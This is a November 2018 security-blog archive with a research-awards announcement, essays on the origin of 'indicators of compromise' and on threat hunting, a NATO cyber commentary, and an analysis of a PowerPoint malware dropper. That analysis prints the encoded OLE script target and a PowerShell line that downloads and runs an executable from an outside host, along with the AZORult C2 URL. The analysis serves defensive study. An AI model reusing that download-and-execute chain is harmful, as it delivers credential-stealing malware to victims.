Monthly Archives: November 2018

Announcing the Google Security and Privacy Research Awards



We believe that cutting-edge research plays a key role in advancing the security and privacy of users across the Internet. While we do significant in-house research and engineering to protect users’ data, we maintain strong ties with academic institutions worldwide. We provide seed funding through faculty research grants, cloud credits to unlock new experiments, and foster active collaborations, including working with visiting scholars and research interns.

To accelerate the next generation of security and privacy breakthroughs, we recently created the Google Security and Privacy Research Awards program. These awards, selected via internal Google nominations and voting, recognize academic researchers who have made recent, significant contributions to the field.

We’ve been developing this program for several years. It began as a pilot when we awarded researchers for their work in 2016, and we expanded it more broadly for work from 2017. So far, we awarded $1 million dollars to 12 scholars. We are preparing the shortlist for 2018 nominees and will announce the winners next year. In the meantime, we wanted to highlight the previous award winners and the influence they’ve had on the field.
2017 Awardees

Lujo Bauer, Carnegie Mellon University
Research area: Password security and attacks against facial recognition

Dan Boneh, Stanford University
Research area: Enclave security and post-quantum cryptography

Aleksandra Korolova, University of Southern California
Research area: Differential privacy

Daniela Oliveira, University of Florida
Research area: Social engineering and phishing

Franziska Roesner, University of Washington
Research area: Usable security for augmented reality and at-risk populations

Matthew Smith, Universität Bonn
Research area: Usable security for developers


2016 Awardees

Michael Bailey, University of Illinois at Urbana-Champaign
Research area: Cloud and network security

Nicolas Christin, Carnegie Mellon University
Research area: Authentication and cybercrime

Damon McCoy, New York University
Research area: DDoS services and cybercrime

Stefan Savage, University of California San Diego
Research area: Network security and cybercrime

Marc Stevens, Centrum Wiskunde & Informatica
Research area: Cryptanalysis and lattice cryptography

Giovanni Vigna, University of California Santa Barbara
Research area: Malware detection and cybercrime


Congratulations to all of our award winners.

The Origin of the Term Indicators of Compromise (IOCs)

I am an historian. I practice digital security, but I earned a bachelor's of science degree in history from the United States Air Force Academy. (1)

Historians create products by analyzing artifacts, among which the most significant is the written word.

In my last post, I talked about IOCs, or indicators of compromise. Do you know the origin of the term? I thought I did, but I wanted to rely on my historian's methodology to invalidate or confirm my understanding.

I became aware of the term "indicator" as an element of indications and warning (I&W), when I attended Air Force Intelligence Officer's school in 1996-1997. I will return to this shortly, but I did not encounter the term "indicator" in a digital security context until I encountered the work of Kevin Mandia.

In August 2001, shortly after its publication, I read Incident Response: Investigating Computer Crime, by Kevin Mandia, Chris Prosise, and Matt Pepe (Osborne/McGraw-Hill). I was so impressed by this work that I managed to secure a job with their company, Foundstone, by April 2002. I joined the Foundstone incident response team, which was led by Kevin and consisted of Matt Pepe, Keith Jones, Julie Darmstadt, and me.

I Tweeted earlier today that Kevin invented the term "indicator" (in the IR context) in that 2001 edition, but a quick review of the hard copy in my library does not show its usage, at least not prominently. I believe we were using the term in the office but that it had not appeared in the 2001 book. Documentation would seem to confirm that, as Kevin was working on the second edition of the IR book (to which I contributed), and that version, published in 2003, features the term "indicator" in multiple locations.

In fact, the earliest use of the term "indicators of compromise," appearing in print in a digital security context, appears on page 280 in Incident Response & Computer Forensics, 2nd Edition.


From other uses of the term "indicators" in that IR book, you can observe that IOC wasn't a formal, independent concept at this point, in 2003. In the same excerpt above you see "indicators of attack" mentioned.

The first citation of the term "indicators" in the 2003 book shows it is meant as an investigative lead or tip:


Did I just give up my search at this point? Of course not.

If you do time-limited Google searches for "indicators of compromise," after weeding out patent filings that reference later work (from FireEye, in 2013), you might find this document, which concludes with this statement:

Indicators of compromise are from Lynn Fischer, Lynn, "Looking for the Unexpected," Security Awareness Bulletin, 3-96, 1996. Richmond, VA: DoD Security Institute.

Here the context is the compromise of a person with a security clearance.

In the same spirit, the earliest reference to "indicator" in a security-specific, detection-oriented context appears in the patent Method and system for reducing the rate of infection of a communications network by a software worm (6 Dec 2002). Stuart Staniford is the lead author; he was later chief scientist at FireEye, although he left before FireEye acquired Mandiant (and me).

While Kevin, et al were publishing the second edition of their IR book in 2003, I was writing my first book, The Tao of Network Security Monitoring. I began chapter two with a discussion of indicators, inspired by my Air Force intelligence officer training in I&W and Kevin's use of the term at Foundstone.

You can find chapter two in its entirety online. In the chapter I also used the term "indicators of compromise," in the spirit Kevin used it; but again, it was not yet a formal, independent term.

My book was published in 2004, followed by two more in rapid succession.

The term "indicators" didn't really make a splash until 2009, when Mike Cloppert published a series on threat intelligence and the cyber kill chain. The most impactful in my opinion was Security Intelligence: Attacking the Cyber Kill Chain. Mike wrote:


I remember very much enjoying these posts, but the Cyber Kill Chain was the aspect that had the biggest impact on the security community. Mike does not say "IOC" in the post. Where he does say "compromise," he's using it to describe a victimized computer.

The stage is now set for seeing indicators of compromise in a modern context. Drum roll, please!

The first documented appearance of the term indicators of compromise, or IOCs, in the modern context, appears in basically two places simultaneously, with ultimate credit going to the same organziation: Mandiant.

The first Mandiant M-Trends report, published on 25 Jan 2010, provides the following description of IOCs on page 9:


The next day, 26 Jan 2010, Matt Frazier published Combat the APT by Sharing Indicators of Compromise to the Mandiant blog. Matt wrote to introduce an XML-based instantiation of IOCs, which could be read and created using free Mandiant tools.


Note how complicated Matt's IOC example is. It's not a file hash (alone), or a file name (alone), or an IP address, etc. It's a Boolean expression of many elements. You can read in the text that this original IOC definition rejects what some commonly consider "IOCs" to be. Matt wrote:

Historically, compromise data has been exchanged in CSV or PDFs laden with tables of "known bad" malware information - name, size, MD5 hash values and paragraphs of imprecise descriptions... (emphasis added)

On a related note, I looked for early citations of work on defining IOCs, and found a paper by Simson Garfinkel, well-respected forensic analyst. He gave credit to Matt Frazier and Mandiant, writing in 2011:

Frazier (2010) of MANDIANT developed Indicators of Compromise (IOCs), an XML-based language designed to express signatures of malware such as files with a particular MD5 hash value, file length, or the existence of particular registry entries. There is a free editor for manipulating the XML. MANDIANT has a tool that can use these IOCs to scan for malware and the so-called “Advanced Persistent Threat.”

Starting in 2010, the debate was initially about the format for IOCs, and how to produce and consume them. We can see in this written evidence from 2010, however, a definition of indicators of compromise and IOCs that contains all the elements that would be recognized in current usage.

tl;dr Mandiant invented the term indicators of compromise, or IOCs, in 2010, building off the term "indicator," introduced widely in a detection context by Kevin Mandia, no later than his 2003 incident response book.

(1) Yes, a BS, not a BA -- thank you USAFA for 14 mandatory STEM classes.

Even More on Threat Hunting

In response to my post More on Threat Hunting, Rob Lee asked:

[D]o you consider detection through ID’ing/“matching” TTPs not hunting?

To answer this question, we must begin by clarifying "TTPs." Most readers know TTPs to mean tactics, techniques and procedures, defined by David Bianco in his Pyramid of Pain post as:

How the adversary goes about accomplishing their mission, from reconnaissance all the way through data exfiltration and at every step in between.

In case you've forgotten David's pyramid, it looks like this.


It's important to recognize that the pyramid consists of indicators of compromise (IOCs). David uses the term "indicator" in his original post, but his follow-up post from his time at Sqrrl makes this clear:

There are a wide variety of IoCs ranging from basic file hashes to hacking Tactics, Techniques and Procedures (TTPs). Sqrrl Security Architect, David Bianco, uses a concept called the Pyramid of Pain to categorize IoCs. 

At this point it should be clear that I consider TTPs to be one form of IOC.

In The Practice of Network Security Monitoring, I included the following workflow:

You can see in the second column that I define hunting as "IOC-free analysis." On page 193 of the book I wrote:

Analysis is the process of identifying and validating normal, suspicious, and malicious activity. IOCs expedite this process. Formally, IOCs are manifestations of observable or discernible adversary actions. Informally, IOCs are ways to codify adversary activity so that technical systems can find intruders in digital evidence...

I refer to relying on IOCs to find intruders as IOC-centric analysis, or matching. Analysts match IOCs to evidence to identify suspicious or malicious activity, and then validate their findings.

Matching is not the only way to find intruders. More advanced NSM operations also pursue IOC-free analysis, or hunting. In the mid-2000s, the US Air Force popularized the term hunter-killer in the digital world. Security experts performed friendly force projection on their networks, examining data and sometimes occupying the systems themselves in order to find advanced threats. 

Today, NSM professionals like David Bianco and Aaron Wade promote network “hunting trips,” during which a senior investigator with a novel way to detect intruders guides junior analysts through data and systems looking for signs of the adversary. 

Upon validating the technique (and responding to any enemy actions), the hunters incorporate the new detection method into a CIRT’s IOC-centric operations. (emphasis added)

Let's consider Chris Sanders' blog post titled Threat Hunting for HTTP User Agents as an example of my definition of hunting. 

I will build a "hunting profile" via excerpts (in italics) from his post:

Assumption: "Attackers frequently use HTTP to facilitate malicious network communication."

Hypothesis: If I find an unusual user agent string in HTTP traffic, I may have discovered an attacker.

Question: “Did any system on my network communicate over HTTP using a suspicious or unknown user agent?”

Method: "This question can be answered with a simple aggregation wherein the user agent field in all HTTP traffic for a set time is analyzed. I’ve done this using Sqrrl Query Language here:

SELECT COUNT(*),user_agent FROM HTTPProxy GROUP BY user_agent ORDER BY COUNT(*) ASC LIMIT 20

This query selects the user_agent field from the HTTPProxy data source and groups and counts all unique entries for that field. The results are sorted by the count, with the least frequent occurrences at the top."

Results: Chris offers advice on how to interpret the various user agent strings produced by the query.

This is the critical part: Chris did not say "look for *this user agent*. He offered the reader an assumption, a hypothesis, a question, and a method. It is up to the defender to investigate the results. This, for me, is true hunting.

If Chris had instead referred users to this list of malware user agents (for example) and said look for "Mazilla/4.0", then I consider that manual (human) matching. If I created a Snort or Suricata rule to look for that user agent, then I consider that automated (machine) matching.

This is where my threat hunting definition likely diverges from modern practice. Analyst Z sees the results of Chris' hunt and thinks "Chris found user agent XXXX to be malicious, so I should go look for it." Analyst Z queries his or her data and does or does not find evidence of user agent XXXX.

I do not consider analyst Z's actions to be hunting. I consider it matching. There is nothing wrong with this. In fact, one of the purposes of hunting is to provide new inputs to the matching process, so that future hunting trips can explore new assumptions, hypotheses, questions, and methods, and let the machines do the matching on IOCs already found to be suggestive of adversary activity. This is why I wrote in my 2013 book "Upon validating the technique (and responding to any enemy actions), the hunters incorporate the new detection method into a CIRT’s IOC-centric operations."

The term "hunting" is a victim of its own success, with emotional baggage. We defenders have finally found a way to make "blue team" work appealing to the wider security community. Vendors love this new way to market their products. "If you're not hunting, are you doing anything useful?" one might ask.

Compared to "I'm threat hunting!" (insert chest beating), the alternative, "I'm matching!" (womp womp), seems sad. 

Nevertheless, we must remember that threat hunting methodologies were invented to find adversary activity for which there were no IOCs. Hunting was IOC-free analysis because we didn't know what to look for. Once you know what to look for, you are matching. Both forms of detection require analysis to validate adversary activity, of course. Let's not forget that.

I'm also very thankful, however it's defined or packaged, that people are excited to search for adversary activity in their environment, whether via matching or hunting. It's a big step from the mindset of 10 years ago, which had a "prevention works" milieu.

tl;dr Because TTPs are a form of IOC, then detection via matching IOCs is a form of matching, and not hunting.

More on Threat Hunting

Earlier this week hellor00t asked via Twitter:

Where would you place your security researchers/hunt team?

I replied:

For me, "hunt" is just a form of detection. I don't see the need to build a "hunt" team. IR teams detect intruders using two major modes: matching and hunting. Junior people spend more time matching. Senior people spend more time hunting. Both can and should do both functions.

This inspired Rob Lee to blog a response, from which I extract his core argument:

[Hunting] really isn’t, to me, about detecting threats...

Hunting is a hypothesis-led approach to testing your environment for threats. The purpose, to me, is not in finding threats but in determining what gaps you have in your ability to detect and respond to them...

In short, hunting, to me, is a way to assess your security (people, process, and technology) against threats while extending your automation footprint to better be prepared in the future. Or simply stated, it’s incident response without the incident that’s done with a purpose and contributes something. 

As background for my answer, I recommend my March 2017 post The Origin of Threat Hunting, which cites my article "Become a Hunter," published in the July-August 2011 issue of Information Security Magazine. I wrote it in the spring of 2011, when I was director of incident response for GE-CIRT.

For the term "hunting," I give credit to briefers from the Air Force and NSA who, in the mid-2000s briefed "hunter-killer" missions to the Red Team/Blue Team Symposium at the Johns Hopkins University Applied Physics Lab in Laurel, MD.

As a comment to that post, Tony Sager, who ran NSA VAO at the time I was briefed at ReBl, described hunting thus:

[Hunting] was an active and sustained search for Attackers...

For us, "Hunt" meant a very planned and sustained search, taking advantage of the existing infrastructure of Red/Blue Teams and COMSEC Monitoring, as well as intelligence information to guide the search. 

For the practice of hunting, as I experienced it, I give credit to our GE-CIRT incident handlers -- David Bianco,  Ken Bradley, Tim Crothers, Tyler Hudak, Bamm Visscher, and Aaron Wade -- who took junior analysts on "hunting trips," starting in 2008-2009.

It is very clear, to me, that hunting has always been associated with detecting an adversary, not "determining what gaps you have in your ability to detect and respond to them," as characterized by Rob.

For me, Rob is describing the job of an enterprise visibility architect, which I described in a 2007 post:

[W]e are stuck with numerous platforms, operating systems, applications, and data (POAD) for which we have zero visibility. 

I suggest that enterprises consider hiring or assigning a new role -- Enterprise Visibility Architect. The role of the EVA is to identify visibility deficiencies in existing and future POAD and design solutions to instrument these resources.

A primary reason to hire an enterprise visibility architect is to build visibility in, which I described in several posts, including this one from 2009 titled Build Visibility In. As a proponent of the "monitor first" school, I will always agree that it is important to identify and address visibility gaps.

So where do we go from here?

Tony Sager, as one of my wise men, offers sage advice at the conclusion of his comment:

"Hunt" emerged as part of a unifying mission model for my Group in the Information Assurance Directorate at NSA (the defensive mission) in the mid-late 2000's. But it was also a way to unify the relationship between IA and the SIGINT mission - intelligence as the driver for Hunting. The marketplace, of course, has now brought its own meaning to the term, but I just wanted to share some history. 

In my younger days I might have expressed much more energy and emotion when encountering a different viewpoint. At this point in my career, I'm more comfortable with other points of view, so long as they do not result in harm, or a waste of my taxpayer dollars, or other clearly negative consequences. I also appreciate the kind words Rob offered toward my point of view.

tl;dr I believe the definition and practice of hunting has always been tied to adversaries, and that Rob describes the work of an enterprise visibility architect when he focuses on visibility gaps rather than adversary activity.

Update 1: If in the course of conducting a hunt you identify a visibility or resistance deficiency, that is indeed beneficial. The benefit, however, is derivative. You hunt to find adversaries. Identifying gaps is secondary although welcome.

The same would be true of hunting and discovering misconfigured systems, or previously unidentified assets, or unpatched software, or any of the other myriad facts on the ground that manifest when one applies Clausewitz's directed telescope towards their computing environment.

NATO’s Cyber Operations Center – Will Russia Feel Threatened?

According to recent reporting, the North Atlantic Treaty Organization (NATO) announced that its Cyber Operations Center (COC) is expected to be fully staffed and functional by 2023.  The new COC marks NATO’s understanding of the importance that cyberspace plays in conflict, particularly in times of political tensions that has resulted in cyber malfeasance that has targeted elections and critical infrastructure.  The establishment of the COC is a natural evolution in how to address cyber attacks in a more timely manner by integrating cyber actions with more conventional military capabilities.  In early 2014, after notable cyber incidents were a part of international incidents that occurred in Estonia in 2007 and Georgia in 2008, the Alliance updated its cyber defense policy to classify digital attacks as the equivalent of kinetic attacks under its collective security arrangement under Article 5 of the treaty.

In those particular instances, Russia was suspected in orchestrating or at least tacitly supporting the cyber attacks that afflicted both states.  Since then, Russia’s alleged cyber activities have only become more brazen in their scale and aggressiveness.  From suspected involvement in launching cyber attacks against Ukrainian critical infrastructure to launching a variety of cyber operations to meddle in the elections of foreign governments, Russia has taken advantage of the uncertainty of cyberspace where there is little consensus on key issues such as Internet governance, cyber norms of state behavior, or the criteria by which cyber attacks escalate to a point of war.

NATO has always provided a strong military counterpoint to Russian influence in the European region and projecting a credible threat in cyberspace is an important complement to NATO capabilities.   However, previously, NATO didn’t have any of its own cyber weapons, a significant problem given Russia’s perceived position of a near-peer level adversary of the United States.  With the establishment of the cyber command, the United States, United Kingdom, and Estonia have offered the Alliance their cyber capabilities.  As described in one news article, the alliance hopes to integrate individual nations’ cyber capabilities into alliance operations, coordinated through the COC and under the command of NATO’s top general. With this in hand, it will be interesting to see if this will serve as the deterrent it’s intended to be and how Russia may adjust their cyber activities, particularly against NATO member countries.

However, there is still the lingering problem the Alliance faces with regards to the rules of engagement.  Classifying cyber attacks under Article 5 is a start but doesn’t help provide a path forward to how NATO can and should engage and respond to cyber attacks.  While this provides NATO a certain flexibility in addressing cyber attacks allowing the Alliance to take each on a case-by-case basis in determining the extent of its response, it does not provide adversarial states an idea of tolerated and intolerable cyber activities.  This shortcoming serves only to provide states like Russia enough wiggle-room to continue their offensive cyber operations as long as they don’t cross an undefined threshold.  It’s long been hypothesized that attacks crippling critical infrastructures would meet that threshold, but as seen in Ukraine, this bar keeps being pushed a little farther each time.

The COC is a much-needed instrument in NATO’s overall toolbox, strengthening the capacity of the Alliance to deter, and where appropriate, retaliate against cyber attacks.  That said, the longer there are no clear lines of what will and will not be deemed acceptable in cyber space will keep the status quo pretty much in place.  Once fully operational, the first test of the COC will be how the it will respond and in what proportion to an attack against a member state.  And it’s at this time all eyes will turn to Russia to see how it will react and alter how and where it conducts its operations.

This is a guest post by Emilio Iasiello

The post NATO’s Cyber Operations Center – Will Russia Feel Threatened? appeared first on CyberDB.

Microsoft Powerpoint as Malware Dropper

Nowadays Microsoft office documents are often used to propagate Malware acting like dynamic droppers. Microsoft Excel within macros or Microsoft Word with user actions (like links or external OLE objects) are the main player in this "Office Dropping Arena". When I figured out that a Microsoft Powerpoint was used to drop and to execute a Malicious payload I was amazed, it's not so common (at least on my personal experiences), so I decided to write a little bit about it.

The "attack-path" is very close to what it's observable on modern threats since years: eMail campaign with attached document and actionable text on it. At the beginning the Microsoft Powerpoint presentation looked like a white blank page but performing a very interesting and hidden connection to: hxxps://a.doko.moe/wraeop.sct

Analysing the Microsoft Powerpoint structure it rises on my eyes the following slide structure

Stage 1: Microsoft PowerPoint Dropping Website
An external OLEobject (compatibility 2006) was available on that value:
Target="%73%63%72%49%50%54:%68%74%74%70%73%3A%2F%2F%61%2E%64oko%2Emo%65%2Fwr%61%65o%70%2E%73%63%74"  
Decoding that string from HEX to ASCII is much more readable:

scrIPT:hxxps://a.dolo.moe/wraeop.sct

An external object is downloaded and executed like a script on the victim machine. The downloaded file (wraeop.sct) represents a Javascript code reporting the Stage 2 of the infection process. It's showed as follows:

Stage 2: Executed Javascript
Decoding the 3.6K script appears clear that one more Stage is involved in the infection process. The following code is the execution path that drives Stage 2 to Stage 3.
var run = new ActiveXObject('WSCRIPT.Shell').Run(powershell  -nologo -executionpolicy bypass -noninteractive -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://batteryenhancer.com/oldsite/Videos/js/DAZZI.exe', '%temp%/VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe'); Start-Process '%temp%/VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe' ); 
The script downloads a file named: AZZI.exe and saves it by a new name: VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe on a System temporary directory for running it. The downloaded PE Executable is a .NET file created by ExtendedScript Toolkit (according to compilation time) on 2018-11-13 15:21:54 and submitted few hours later on VirusTotal.

Stage 3: .NET file 
The Third stage uses an internal resource (which happens to be an image) to read and execute additional code: the final payload or Stage 4. In other words Stage 3 reads an image placed under the internal resource of PE File, extracts and executes it. The final payload looks like AzoRult Malware. The evidence comes from traffic analysis where the identified pattern sends (http POST) data on browser history and specific crafted files under User - AppData to specific php pages. Moreover the Command and control admin panel (hxxps://ominigrind.ml/azzi/panel/admin.php) looks like AZOrultV3.


Stage4: AZORult evidences


I hope you had fun on this, I did! It was super interesting to see Attacker's creativity and the way the act to include malicious contents into Office Documents. Microsoft should probably take care of this and try to filter or to ask permissions before include external contents, but still this will not be a complete solution (on my personal point of view). A more deep and invasive action would be needed to check the remote content. Stay tuned! 

IoC:
Original Powerpoint: 6ae5583ec767b7ed16aaa45068a1239a827a6dae95387d5d147c58c7c5f71457
wraeop.sct: 4f38fcea4a04074d2729228fb6341d0c03363660f159134db35b4d259b071bb0
download1: hxxps://a.dolo.moe/wraeop.sct
download2: hxxp://batteryenhancer.com
DAZZI.exe: c26de4d43100d24017d82bffd1b8c5f1f9888cb749ad59d2cd02ef505ae59f40
Resource Img: 965b74e02b60c44d75591a9e71c94e88365619fe1f82208c40be518865a819da
C2: hxxps://ominigrind.ml/azzi/index.php

Get 90% Off Your First Year of RemotePC, Up To 50 Computers for $6.95

iDrive has activated a significant discount on their Remote access software RemotePC in these days leading into Black Friday. RemotePC by iDrive is a full-featured remote access solution that lets you connect to your work, home or office computer securely from anywhere, and from any iOS or Android device. Right now, their 50 computer package is 90% off or just $6.95 for your 1st year. If you've been thinking about remote access solutions, now is a good time to consider RemotePC. Learn more about it here.

To read this article in full, please click here